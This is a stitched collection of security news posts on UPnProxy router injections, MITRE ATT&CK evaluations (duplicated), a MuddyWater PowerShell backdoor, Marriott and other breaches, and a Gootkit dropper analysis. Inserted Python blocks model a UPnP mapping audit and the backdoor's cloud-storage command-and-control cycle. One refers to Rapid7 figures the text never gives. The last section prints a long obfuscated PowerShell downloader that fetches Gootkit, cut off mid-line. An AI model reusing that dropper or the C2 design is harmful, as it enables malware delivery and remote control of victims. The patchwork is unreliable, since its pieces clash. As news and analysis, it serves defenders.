“In Akamai’s previous research, we highlighted the possibility that attackers could leverage UPnProxy to exploit systems living behind the compromised router. Unfortunately, data from this recent batch of injections suggests this is exactly what’s happening.” Akamai notes.

“For home users, these attacks can lead to a number of complications, such as degraded service, malware infections, ransomware, and fraud. But for business users, these recent developments could mean systems that were never supposed to exist on the internet in the first place, could now be living there unknowingly, greatly increasing their chances of being compromised. Even more concerning, the services being exposed by this particular campaign have a history of exploitation related to crippling worms and ransomware campaigns targeting both Windows and Linux platforms.”

The latest campaign observed by Akamai, tracked as EternalSilence, targets millions of machines living behind the vulnerable routers by leveraging the EternalBlue (CVE-2017-0144, Windows SMBv1) and EternalRed (CVE-2017-7494, Samba) exploits.

“Taking current disclosures and events into account, Akamai researchers believe that someone is attempting to compromise millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed exploits.” continues Akamai.

“Unfortunately, Akamai researchers are not able to see what happens after the injections have occurred, they can only see the injections themselves and not the final payloads that would be directed at the machines exposed. However, a successful attack could yield a target rich environment, opening up the chance for such things as ransomware attacks, or a persistent foothold on the network.”

Akamai observed millions of successful injections that expose systems running SMB services (TCP ports 139 and 445) to the Internet; the researchers speculate that the attackers are leveraging the Eternal family of exploits from the leaked NSA arsenal.

Hackers hijacked some 45,113 routers that expose a total of 1.7 million unique machines to the attackers.

“Additionally, there is no way to tell if EternalBlue or EternalRed was used to successfully compromise the exposed machine. However, if only a fraction of the potentially exposed systems were successfully compromised and fell into the hands of the attackers, the situation would quickly turn from bad to worse,” states Akamai.

According to the experts, the attackers are being opportunistic: they are either scanning the Internet for SSDP (UDP/1900) and pivoting to the TCP UPnP daemons, or targeting a set of devices that use static ports (TCP/2048) and paths (/etc/linuxigd/gatedesc.xml) for their UPnP daemons.
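Akamai’s indicator is the injected NAT entry itself, so the practical check is to read back the router’s port-mapping table over the same UPnP SOAP interface the attackers use. The block below is an added example, not Akamai’s tooling and not code from the post: it builds the SSDP discovery datagram and the `GetGenericPortMappingEntry` request, parses the reply, and flags entries that forward to a host outside the LAN (a proxy hop) or to SMB on a LAN host (the EternalSilence pattern). The LAN prefix `192.168.1.0/24`, the helper names and the SOAP replies are constructed for the example; the real replies come from an HTTP POST to the control URL named in the device description.

```python
"""Read back a router's UPnP IGD port-mapping table and flag UPnProxy-style injections.

Added example; not Akamai's tooling and not code from the post. It assumes a
WANIPConnection:1 control URL taken from the device description (e.g. the
/etc/linuxigd/gatedesc.xml path above); the LAN prefix and SOAP replies are constructed."""
import ipaddress
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
SMB_PORTS = {139, 445}


def build_ssdp_msearch():
    """Discovery datagram for UDP/1900 (the scan step); each reply carries a LOCATION
    header pointing at the device description XML that names the control URL."""
    return ('M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nMAN: "ssdp:discover"\r\n'
            "MX: 2\r\nST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n").encode()


def build_get_mapping_request(index):
    """SOAP body for GetGenericPortMappingEntry(index); POST it to the control URL with
    the header SOAPAction set to the WANIP service type + '#GetGenericPortMappingEntry'."""
    return ('<?xml version="1.0"?>'
            f'<s:Envelope xmlns:s="{SOAP_NS}" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
            f'<u:GetGenericPortMappingEntry xmlns:u="{WANIP}">'
            f'<NewPortMappingIndex>{int(index)}</NewPortMappingIndex>'
            '</u:GetGenericPortMappingEntry></s:Body></s:Envelope>')


def parse_mapping_response(xml_text):
    """Mapping as a dict, or None on a SOAP fault (error 713 SpecifiedArrayIndexInvalid
    is how the device says the table is exhausted)."""
    body = ET.fromstring(xml_text).find(f"{{{SOAP_NS}}}Body")
    resp = body.find(f"{{{WANIP}}}GetGenericPortMappingEntryResponse")
    if resp is None:
        return None

    def arg(name):  # UPnP argument elements carry no namespace
        el = resp.find(name)
        return (el.text or "").strip() if el is not None else ""

    return {"remote_host": arg("NewRemoteHost"), "protocol": arg("NewProtocol"),
            "external_port": int(arg("NewExternalPort")),
            "internal_client": arg("NewInternalClient"),
            "internal_port": int(arg("NewInternalPort")),
            "enabled": arg("NewEnabled") == "1",
            "description": arg("NewPortMappingDescription")}


def classify_mapping(m, lan):
    """Why a mapping looks injected rather than user-made: it forwards to a host outside
    the LAN (the router is a proxy hop, the original UPnProxy use) or to SMB on a LAN
    host (the EternalSilence pattern, exposing it to EternalBlue/EternalRed attacks)."""
    reasons = []
    try:
        if ipaddress.ip_address(m["internal_client"]) not in lan:
            reasons.append("forwards to a host outside the LAN (proxy hop)")
    except ValueError:
        reasons.append("internal client is not an IP address")
    if m["internal_port"] in SMB_PORTS:
        reasons.append(f"exposes SMB port {m['internal_port']} on {m['internal_client']}")
    return reasons


def audit_port_mappings(fetch_response, lan="192.168.1.0/24"):
    """Walk indexes 0, 1, 2, ... with fetch_response(index) -> SOAP XML until the device
    faults; return the suspicious mappings with their reasons."""
    lan, findings, index = ipaddress.ip_network(lan), [], 0
    while True:
        mapping = parse_mapping_response(fetch_response(index))
        if mapping is None:
            return findings
        reasons = classify_mapping(mapping, lan)
        if reasons:
            findings.append({"index": index, **mapping, "reasons": reasons})
        index += 1


# Constructed replies: a legitimate entry, a proxy hop, an SMB exposure, then the fault.
def _reply(ext_port, client, int_port, desc):
    return (f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Body>'
            f'<u:GetGenericPortMappingEntryResponse xmlns:u="{WANIP}">'
            f'<NewRemoteHost></NewRemoteHost><NewExternalPort>{ext_port}</NewExternalPort>'
            f'<NewProtocol>TCP</NewProtocol><NewInternalPort>{int_port}</NewInternalPort>'
            f'<NewInternalClient>{client}</NewInternalClient><NewEnabled>1</NewEnabled>'
            f'<NewPortMappingDescription>{desc}</NewPortMappingDescription>'
            '<NewLeaseDuration>0</NewLeaseDuration>'
            '</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>')


SAMPLE_TABLE = [_reply(32400, "192.168.1.10", 32400, "Plex Media Server"),
                _reply(47851, "203.0.113.7", 80, "svc"), _reply(46571, "192.168.1.23", 445, "svc")]
SOAP_FAULT_713 = (f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Body><s:Fault><faultcode>s:Client</faultcode>'
                  '<faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0">'
                  '<errorCode>713</errorCode></UPnPError></detail></s:Fault></s:Body></s:Envelope>')


def sample_fetch(index):
    """Stands in for the HTTP POST of build_get_mapping_request(index) to the control URL."""
    return SAMPLE_TABLE[index] if index < len(SAMPLE_TABLE) else SOAP_FAULT_713
```

Against a real gateway, replace `sample_fetch` with a function that POSTs `build_get_mapping_request(index)` to the control URL and returns the body; a device that serves its UPnP SOAP endpoint on the WAN side, as the Rapid7 numbers above describe, will answer this enumeration from the Internet just as it answers the injections. Any entry pointing at 139 or 445, or at an address that is not on your LAN, did not come from a legitimate client and should be deleted (`DeletePortMapping`) after the firmware is updated and UPnP is disabled on the WAN interface.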

“Criminals are clever, and will take any advantage they can get when it comes to exploiting systems and services. So, while it is unfortunate to see UPnProxy being actively leveraged to attack systems previously shielded behind the NAT, it was bound to happen eventually.” concludes Akamai. “That these attacks likely leverage two well-known vulnerabilities, which have been patched for some time, should come as no surprise.”

Pierluigi Paganini

(Security Affairs – UPnProxy, NSA hacking tools)

The post ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools appeared first on Security Affairs.

Moscow’s cable car service shuts down in 2 days after ransomware attack

By Waqas

The first cable-car service was launched in Moscow this Tuesday, and free rides to and from Luzhniki Stadium were promised to the visitors throughout the first month. Naturally, people were eager to ride the cable-car and thronged the location. However, much to their dismay, only after a few days the service got attacked with ransomware. […]

This is a post from HackRead.com. Read the original post: Moscow’s cable car service shuts down in 2 days after ransomware attack

Security Affairs: MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation’s ATT&CK framework has been used to evaluate the detection capabilities of enterprise security products from several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products on their ability to detect the techniques used by advanced persistent threats.

The MITRE ATT&CK evaluation service evaluates endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principal cybersecurity engineer at MITRE.

Duff explained that MITRE adopts a transparent methodology and a public knowledge base that make the results obtained with its service easy to interpret.


In the first phase, MITRE evaluated the products against an emulation of the techniques used by the APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group that operates under the control of China’s Ministry of State Security. The group is responsible for several cyber espionage campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. As of June 2015, it appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.

The first round of ATT&CK evaluations conducted by MITRE assessed the ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect the techniques associated with APT3.

The tests focus on a product’s ability to detect the malicious activities that threat actors typically carry out once they have compromised a system inside an organization. It is important to note that the evaluation does not assign a score to each product; it is not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with the vendors during the evaluations and shared the results with them.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the vendors above, which signed up before the June 30, 2018 cohort deadline.

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.
Security Affairs

MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation’s ATT&CK framework has been used to evaluate the efficiency of several enterprise security products designed by several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products based on their ability in detecting advanced persistent threats.

The MITRE ATT&CK evaluation service evaluates endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principle cybersecurity engineer at MITRE.

Duff explained MITRE adopt a transparent methodology and knowledge base that will make easy to interpret results obtained with its service.

ATT&CK framework

In the first phase, MITRE offered the possibility to evaluate the service and its efficiency on a case study on APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group, it operates under the control of the China’s Ministry of State Security. The cyber espionage group is responsible for several cyber espionage campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.  As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. 

The first tests of the ATT&CK framework conducted by Mitre evaluatedthe ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect the APT3 cyberespionage group.

The tests are focused on the product’s capabilities of detecting malicious activities typically carried out by the threat actors once they have compromised the system of an organization. It is important to highlight that the MITRE ATT&CK framework does not assign scores to each product, it is not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with vendors during the evaluations and sharing with them the results.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the vendors listed above, which signed up before the June 30, 2018 cohort deadline.

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.

New PowerShell-based Backdoor points to MuddyWater

Security researchers at Trend Micro recently discovered a PowerShell-based backdoor that resembles malware used by the MuddyWater threat actor.

Malware researchers at Trend Micro have discovered a Powershell-based backdoor that is very similar to a malware used by MuddyWater APT group.

The first MuddyWater campaign was observed in late 2017, when researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ because of the confusion in attributing the attacks, which took place between February and October 2017 and targeted entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

The threat actors used a PowerShell-based first-stage backdoor named POWERSTATS; over time they changed tools and techniques.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group (the name FireEye uses to track MuddyWater) that targeted Asia and the Middle East from January 2018 to March 2018.

In the latest attacks detected by Trend Micro, the threat actors used TTPs consistent with MuddyWater, and the malicious code was uploaded to VirusTotal from Turkey. The attackers used decoy documents that drop a new PowerShell backdoor similar to MuddyWater’s POWERSTATS malware.

“These documents are named Raport.doc or Gizli Raport.doc (titles mean “Report” or “Secret Report” in Turkish) and maliyeraporti (Gizli Bilgisi).doc (“finance (Confidential Information)” in Turkish) — all of which were uploaded to Virus Total from Turkey.” states Trend Micro.

“Our analysis revealed that they drop a new backdoor, which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor. But, unlike previous incidents using POWERSTATS, the command and control (C&C) communication and data exfiltration in this case is done by using the API of a cloud file hosting provider.”

The new backdoor uses the API of a cloud file hosting provider to implement command and control (C&C) communication and data exfiltration.

The weaponized documents contain images showing blurry logos of Turkish government organizations; the blurring tricks victims into enabling macros in order to display the document properly.


The macros contain strings encoded in base52, an uncommon encoding that MuddyWater has used in past attacks. Once enabled, the macros drop a .dll file (with PowerShell code embedded) and a .reg file into the %temp% directory.

The PowerShell code has several layers of obfuscation. The backdoor first collects system information and concatenates the various pieces (OS name, domain name, user name, IP address) into one long string.

For communication, the malware uses files named <md5(hard disk serial number)> with an extension that identifies the purpose of the file:

  • .cmd – text file with a command to execute
  • .reg – system info as generated by myinfo() function, see screenshot above
  • .prc – output of the executed .cmd file, stored on local machine only
  • .res – output of the executed .cmd file, stored on cloud storage

“In both the older version of the MuddyWater backdoor and this recent backdoor, these files are used as an asynchronous mechanism instead of connecting directly to the machine and issuing a command.” the experts continue.

“The malware operator leaves a command to execute in a .cmd file, and comes back later to retrieve the .res files containing the result of the issued command.”

The malware supports various commands including file upload, persistence removal, exit, file download, and command execution.
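The asynchronous exchange described above, as an added example that is neither Trend Micro’s nor the attackers’ code: an in-memory stand-in for the cloud storage API, the implant’s check-in cycle and the operator’s two actions, plus a hunting routine that spots md5-named file sets in a storage listing and ties them back to a host when disk serials from the asset inventory are known. The serial, the system-information string and the command runner are constructed; hashing the serial as a UTF-8 string and clearing a consumed .cmd file are assumptions, the article specifies neither.

```python
import hashlib
import re
from collections import defaultdict

# The four roles the backdoor assigns to <md5(serial)>.<ext> files.
NAME_RE = re.compile(r"^([0-9a-f]{32})(\.(?:cmd|reg|prc|res))$")


def implant_stem(disk_serial):
    """Stem shared by all of one victim's files: md5 of its hard disk serial.

    Assumption: the serial is hashed as a UTF-8 string; the article only says
    md5(hard disk serial number).
    """
    return hashlib.md5(disk_serial.encode("utf-8")).hexdigest()


class CloudShare:
    """Stand-in for the file hosting provider's API: a dict of name -> content."""

    def __init__(self):
        self.files = {}

    def put(self, name, data):
        self.files[name] = data

    def get(self, name):
        return self.files.get(name)

    def delete(self, name):
        self.files.pop(name, None)

    def listing(self):
        return sorted(self.files)


def implant_cycle(cloud, disk_serial, sysinfo, run_command):
    """One check-in of the implant.

    Uploads the system-information string as .reg, looks for a .cmd task,
    runs it through run_command (a stand-in for real command execution),
    keeps the output locally (.prc) and uploads it as .res.  Returns the
    output, or None when no task was waiting.  Clearing the consumed .cmd is
    an assumption; the article does not say how tasks are retired.
    """
    stem = implant_stem(disk_serial)
    cloud.put(stem + ".reg", sysinfo)
    task = cloud.get(stem + ".cmd")
    if task is None:
        return None
    output = run_command(task)
    local_prc = output                 # .prc never leaves the victim machine
    cloud.put(stem + ".res", output)   # .res is what the operator reads back
    cloud.delete(stem + ".cmd")
    return local_prc


def operator_task(cloud, stem, command):
    """Operator side: leave a command and walk away."""
    cloud.put(stem + ".cmd", command)


def operator_collect(cloud, stem):
    """Operator side: come back later for the result."""
    return cloud.get(stem + ".res")


def hunt(filenames, known_serials=()):
    """Flag md5-named file sets in a storage listing and tie them to hosts.

    A stem is reported when at least two of the four extensions are present,
    or when it equals md5(serial) for a serial from the asset inventory.
    """
    by_stem = defaultdict(set)
    for name in filenames:
        m = NAME_RE.match(name)
        if m:
            by_stem[m.group(1)].add(m.group(2))
    serial_for = {implant_stem(s): s for s in known_serials}
    return [
        {"stem": stem, "extensions": sorted(exts), "serial": serial_for.get(stem)}
        for stem, exts in sorted(by_stem.items())
        if len(exts) >= 2 or stem in serial_for
    ]


if __name__ == "__main__":
    # Constructed sample: one victim, one task, one collection.
    serial = "WD-WCC4N1234567"
    sysinfo = "Windows 10|CORP|svc-finance|10.1.2.3"
    runner = lambda cmd: "CORP\\svc-finance" if cmd == "whoami" else "unknown"
    cloud = CloudShare()
    implant_cycle(cloud, serial, sysinfo, runner)            # beacon only
    operator_task(cloud, implant_stem(serial), "whoami")
    implant_cycle(cloud, serial, sysinfo, runner)            # task executed
    print(operator_collect(cloud, implant_stem(serial)))
    for finding in hunt(cloud.listing(), known_serials=[serial]):
        print(finding)
```

Nothing in this exchange ever connects to the victim: both sides only talk to the storage provider, which is why the traffic blends in with legitimate cloud use and why hunting has to start from the storage side (file naming, the .reg/.res pairing) or from the host (the .prc files in the implant’s working directory).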

Experts concluded that the attacks targeted Turkish government organizations in the finance and energy sectors, which MuddyWater had also hit in the past.

“This is yet another similarity with previous MuddyWater campaigns, which were known to have targeted multiple Turkish government entities.” concludes Trend Micro.

“If the group is responsible for this new backdoor, it shows how they are improving and experimenting with new tools,” Trend Micro concludes.

Pierluigi Paganini

(Security Affairs – MuddyWater, backdoor)

The post New PowerShell-based Backdoor points to MuddyWater appeared first on Security Affairs.

Hacker hijacks 50,000 printers to tell people to subscribe to PewDiePie

Over the course of this week, some printers have been printing out a strange message asking people to subscribe to PewDiePie's YouTube channel. The message appears to be the result of a simple exploit that allows printers to receive data over the internet, including print commands. A person with the online handle TheHackerGiraffe has claimed responsibility for the attack.

Via: The Verge

Source: TheHackerGiraffe

327 million Marriott guests affected in Starwood Data Breach

Starwood Data Breach – Hackers had access to the guest reservation system of the Marriott-owned Starwood chain since 2014 and copied and encrypted its information.

Marriott International is the latest victim in a long string of data breaches: the company announced that hackers compromised the guest reservation database of its Starwood hotels subsidiary and stole the personal details of up to about 500 million guests.

“The company has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property.” reads the data breach notification published by Marriot.

“For approximately 327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences.”

This is one of the largest data breaches in history, and the biggest one for the hospitality industry.

Marriott International bought Starwood Hotels and Resorts Worldwide in 2016 for $13 billion. The brand includes St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton and Design Hotels.

According to the company, the hackers had access to Starwood’s guest reservation system since 2014 and copied and encrypted the information.

The intrusion was detected on September 8 when a monitoring system found evidence regarding an attempt to access the Starwood guest reservation database in the United States. Two months later, on November 19, an investigation confirmed the intrusion into the archive containing “guest information relating to reservations at Starwood properties on or before September 10, 2018.”

Unknown hackers accessed personal information of nearly 327 million guests, compromised records include names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, genders, arrival and departure information, reservation date.


The investigation into the Starwood data breach revealed that the stolen data also includes financial information: payment card numbers and expiration dates were exposed, albeit in encrypted form.

“For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128).” continues the data breach notification.
“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken.  For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information.”

According to Marriott, hackers did not access the Marriott network.

The company reported the incident to the law enforcement and data protection authorities, it is also notifying potentially impacted customers.

According to the EU General Data Protection Regulation (GDPR) regulation, Marriott could face a maximum fine of 20 million euros or 4 percent of its annual global revenue if data protection authorities

Pierluigi Paganini

(Security Affairs – Starwood Data Breach, Marriot)

The post 327 million Marriott guests affected in Starwood Data Breach appeared first on Security Affairs.

Marriott hotel data breach: Sensitive data of 500 million guests stolen

By Waqas

Marriott has announced that it has suffered a massive data breach after attackers hacked its guest reservation system at Starwood hotels, a group of hotels the company took over in 2016 – These hotels include Sheraton, St. Regis, Westin and W Hotels. The breach was discovered last week after Marriott’s internal security tool alerted the company regarding an attempt to access the […]

This is a post from HackRead.com Read the original post: Marriott hotel data breach: Sensitive data of 500 million guests stolen

That Bloomberg Supply-Chain-Hack Story

Back in October, Bloomberg reported that China has managed to install backdoors into server equipment that ended up in networks belonging to -- among others -- Apple and Amazon. Pretty much everybody has denied it (including the US DHS and the UK NCSC). Bloomberg has stood by its story -- and is still standing by it.

I don't think it's real. Yes, it's plausible. But first of all, if someone actually surreptitiously put malicious chips onto motherboards en masse, we would have seen a photo of the alleged chip already. And second, there are easier, more effective, and less obvious ways of adding backdoors to networking equipment.

Dunkin Donuts Perks loyalty data breach: Change your password

By Waqas

Dunkin Donuts says it has suffered a data breach in which customer data of its DD Perks loyalty program may have been stolen – The DD Perk is a reward program for the company’s regular customers. According to a now-inaccessible security advisory, Dunkin Donuts stated that the data breach was initially detected on October 31st forcing it to […]

This is a post from HackRead.com Read the original post: Dunkin Donuts Perks loyalty data breach: Change your password

Feds charge 2 Iranian hackers behind SamSam ransomware attacks

By Waqas

The United States Department of Justice has charged two Iranian nationals with allegedly developing and using SamSam ransomware against their targets in the United States and Canada to carry out computer hacking and extortion scheme from Iran. Both Mohammad Mehdi Shah Mansouri, 27 and Faramarz Shahi Savandi, 34 have been charged with six counts together with one count of conspiracy […]

This is a post from HackRead.com Read the original post: Feds charge 2 Iranian hackers behind SamSam ransomware attacks

Dissecting the Mindscrew-Powershell Obfuscation

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims of a recent attack.

Introduction

A few days ago, the CERT-Yoroi bulletin N061118 disclosed a dangerous campaign targeting Italian users. The attack wave used some interesting techniques that deserved a closer look, especially the obfuscation used to hide the malicious dropping infrastructure.

The Yoroi-Cybaze ZLAB dissected the VBS script embedded in the zip archives delivered to the victims and found an inner PowerShell payload designed to download the Gootkit binary from the attacker’s infrastructure. This inner script was obfuscated in a clever, previously unseen way.

Technical Analysis

The PowerShell code executed by the initial VBS script appears as follows:

  1. ( ‘…..’|%{${#/~} =+ $()}{ ${@}=${#/~}} { ${/.} = ++${#/~}}{ ${*~}=(${#/~} =${#/~} +${/.})} {${$./} =(${#/~}= ${#/~} + ${/.} )}{${)@}=( ${#/~}=${#/~}+${/.} )} { ${‘} =(${#/~} =${#/~}+ ${/.}) } { ${;} = ( ${#/~}=${#/~} + ${/.}) } {${ *-}= ( ${#/~}=${#/~}+${/.})} {${“[+} = ( ${#/~} =${#/~} +${/.} ) } { ${#~=}= ( ${#/~}= ${#/~}+ ${/.} )} { ${“@} =”[” +”$(@{ } ) “[${ *-} ] + “$(@{})”[ “${/.}” +”${#~=}” ]+ “$(@{ })”[“${*~}”+”${@}”]+”$? “[${/.} ]+”]” }{${#/~} = “”.(“$( @{} )”[ “${/.}${)@}” ]+”$(@{ }) “[“${/.}${;}”] + “$( @{ } ) “[ ${@}]+ “$(@{} ) “[ ${)@}]+ “$?”[${/.}] + “$( @{ } ) “[${$./} ])}{${#/~} =”$( @{} ) “[ “${/.}${)@}”] + “$( @{ } )”[${)@}] +”${#/~}”[ “${*~}${ *-}”]} ); .${#/~} (“${#/~} (${“@}${/.}${@}${‘} + ${“@}${/.}${@}${*~} +${“@}${)@}${@}+ ${“@}${$./}${;}+${“@}${/.}${@}${)@} +${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;} +${“@}${)@}${;}+${“@}${/.}${/.}${“[+}+${“@}${/.}${@}${/.}+${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${‘}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${@}+${“@}${)@}${;}+ ${“@}${/.}${@}${#~=} + ${“@}${#~=}${ *-}+ ${“@}${/.}${@}${;}+ ${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${)@}+ ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${/.}${@}${“[+} + ${“@}${/.}${/.}${;}+ ${“@}${$./}${*~} +${“@}${‘}${/.} + ${“@}${)@}${/.}+ ${“@}${/.}${*~}${$./} + ${“@}${ *-}${$./}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${;}+ ${“@}${)@}${‘}+${“@}${ *-}${ *-}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${@}+ ${“@}${/.}${/.}${ *-}+${“@}${/.}${@}${“[+} +${“@}${/.}${@}${/.}+${“@}${$./}${*~} +${“@}${;}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${;}+${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@}+ ${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${@}${*~} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${)@} + ${“@}${/.}${*~}${‘}+${“@}${$./}${*~} +${“@}${“[+}${$./} + ${“@}${/.}${/.}${;} + ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} + ${“@}${;}${;} + 
${“@}${/.}${@}${‘}+${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@} +${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${‘}+${“@}${/.}${@}${*~} +${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${)@} + ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${“[+}${$./}+ ${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${ *-} + ${“@}${/.}${/.}${)@}+ ${“@}${#~=}${#~=}+${“@}${/.}${@}${/.} + ${“@}${$./}${*~}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${‘}+${“@}${‘}${“[+}+ ${“@}${)@}${ *-}+${“@}${)@}${ *-}+${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${)@} + ${“@}${/.}${@}${/.} + ${“@}${/.}${@}${@} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${/.} + ${“@}${)@}${;}+${“@}${/.}${@}${#~=}+ ${“@}${#~=}${ *-}+${“@}${/.}${/.}${;} +${“@}${/.}${/.}${;} +${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${@}+${“@}${/.}${/.}${‘}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${#~=} + ${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${‘} +${“@}${/.}${/.}${;} + ${“@}${)@}${;}+ ${“@}${#~=}${#~=} + ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${#~=}+ ${“@}${)@}${ *-} + ${“@}${#~=}${#~=}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${/.}${@}+${“@}${/.}${@}${‘} + ${“@}${/.}${/.}${“[+} + ${“@}${)@}${ *-}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@} + ${“@}${/.}${/.}${;}+${“@}${/.}${@}${/.}+ ${“@}${/.}${/.}${)@}+${“@}${)@}${;} + ${“@}${/.}${/.}${*~}+ ${“@}${/.}${@}${)@} +${“@}${/.}${/.}${*~} + ${“@}${‘}${‘} +${“@}${$./}${*~}+${“@}${)@}${‘}+${“@}${;}${“[+}+ ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+ 